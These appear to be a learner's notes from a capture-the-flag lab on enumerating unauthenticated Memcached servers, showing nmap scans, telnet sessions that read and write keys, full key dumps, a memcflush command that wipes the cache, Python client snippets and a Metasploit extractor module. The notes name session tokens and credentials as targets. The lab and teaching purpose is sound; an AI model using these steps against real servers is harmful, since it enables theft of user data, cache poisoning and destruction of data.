https://public.attackdefense.com/challengedetails?cid=512
[ PART-1 ]
[About Memcached]
 - memcached is a high-performance, distributed memory object caching system, generic in nature, but originally intend for use in speeding up dynamic web applications by alleviating database load. You can think as a short-term memory for your applications.
------------------------------------------------------
http://memcached.org/about
https://github.com/memcached/memcached/wiki
https://github.com/memcached/memcached/wiki/Commands
https://github.com/memcached/memcached/wiki/Protocols
------------------------------------------------------
stats
version
get
set
quit

https://github.com/nmap/nmap/tree/master/scripts


root@attackdefense:~# nmap -sV -n -p- 192.243.150.3
PORT      STATE SERVICE   VERSION
11211/tcp open  memcached Memcached 1.5.12 (uptime 238 seconds)
MAC Address: 02:42:C0:F3:96:03 (Unknown)

root@attackdefense:~# nmap -p11211 --script memcached-info 192.243.150.3
PORT      STATE SERVICE
11211/tcp open  memcache
| memcached-info: 
|   Process ID: 8
|   Uptime: 511 seconds
|   Server time: 2021-04-18T03:44:12
|   Architecture: 64 bit
|   Used CPU (user): 0.023454
|   Used CPU (system): 0.012172
|   Current connections: 2
|   Total connections: 5
|   Maximum connections: 2147
|   TCP Port: 11211
|   UDP Port: 0
|_  Authentication: no
MAC Address: 02:42:C0:F3:96:03 (Unknown)

# nc 192.243.150.3 11211
# telnet 192.243.150.3 11211

get flag
set flag2 0 30 4
abcd			{4 byte data}
------------------------------------------------------
root@attackdefense:~# telnet 192.243.150.3 11211
Trying 192.243.150.3...
Connected to 192.243.150.3.
Escape character is '^]'.
> version
VERSION 1.5.12
> get flag
VALUE flag 0 32
25c8dc1c75c9965dff9afd3c8ced2775
END
> set flag2 0 30 4
> abcd
STORED
> get flag2
VALUE flag2 0 4
abcd
END
------------------------------------------------------
[ PART-2 ]
=> Why Recon Memcached ?
* Application caches generally contain juicy data:
 - Session data: cookies, tokens, end user data
 - Credentials: usernames passwords
 - Globally important data: cached homepage, common non-user specific data
 - .. And other application dependent matarial.
* Data exfiltration 
* Cache data injection, tempering and posioning
* Attacking application logic
* Denial of Service attacks

=> Retrieve all keys Values
* Key-value pairs are stored in "slabs"
* Differnt slabs house data of different sizes
* process to recover all key-values:
 - find the list of slabs ("slab ids")
 - Dump keys in the slab
 - Get the value corresponding to the key
* More: https://github.com/memcached/memcached/wiki/UserInternals

> stats slabs
> stats items
> stats cachedump [slab-id] [no of line dump, 0-means all lines]
> stats cachedump 1 0
> get flag
> get country

[part-3] (00:34:56)
recon with libmemcached-tools
=> command line tools to interact wih memcache server
=> simplifies complicated interactions
=> https://libmemcached.org/libMemcached.html
=> https://packages.debian.org/sid/libmemcached-tools

> memcstat --servers=192.243.150.3
> memcdump --servers=192.243.150.3
> memccat --servers=192.243.150.3 flag

> memccp --servers=192.243.150.3 README
> memcdump --servers=192.243.150.3
> memccat --servers=192.243.150.3 README

/usr/share/memcached/scripts/memcached-tool
/usr/share/memcached/scripts/memcached-tool 192.243.150.3:11211
/usr/share/memcached/scripts/memcached-tool 192.243.150.3:11211 dump

> memcflush --servers=192.243.150.3 

[Part-4] (00:46:00) :: Remote Python Access
=> Why Python ?
 - Memcached's are data heavy servers
 - Automate download and searching
 - Scan subnets to discover and recon servers
 - API is meant to be the default way to access 

=> Pymemcache
	https://github.com/pinterest/pymemcache
	https://github.com/linsomniac/python-memcached/blob/master/memcache.py
=> Python-Memcacched
	https://github.com/linsomniac/python-memcached
	https://pymemcache.readhedocs.io/en/latest/getting_started.html
=> Pylibmc
http://sendapatch.se/projects/pylibmc/

import memcache
mc = memcache.client(['remote-ip'], debug=0)
x = mc.get("flag")
x
x = mc.set("demo", 123)
mc.get("demo")
mc.incr("demo")
mc.get("demo")
mc.decr("demo")
mc.get("demo")

[https://pymemcache.readthedocs.io/en/latest/getting_started.html]
from pymemcache.client.base import Client
client = Client('memcache-ip',11211)
client.get('demo')

[Part-5] (00:56:33) :: Advanced Enumeration: LRU Crawler

stats items
stats cachedump 1 0

Least Recently Used (LRU)
[http://memcached.org/blog/modern-lru]
 - Segmented LRU
 - Cache sizes configurable/disabled
 - Items migrated between segments

Hot --> Warm <--- Cold 	{default LRU dump cold items/cached}

stats items
stats cachedump 1 0
lru_crawler metadump all

https://github.com/memcached/memcached/blob/master/protocol.txt

lru mode flat
stats items
stats settings
stats cachedump 1 0
	(01:09:55) 

[Part-4] (01:11:00) :: Advanced Enumeration - WATCHERS

Monitoring Memcache
* Cache data is highly volatile
 - Different items, different expiry
* Need to monitor cache
* Automate with API

https://github.com/memcached/memcached/blob/master/doc/protocol.txt
(Watchers)
(Terminal-1)
# telnet 192.238.198.3.11211
> version
> watch fetchers

(Terminal-2)
# telnet 192.238.198.3.11211
> set abc 0 100 6
 123456
> delete abc
(01:17:12)

[Part-7] (01:17:55) :: Metasploit Memcache Enumeration
> search memcache
> use auxilary/gather/memcached_extractor
> show options
> show advanced
> set RHOST 192.152.123.3
> run
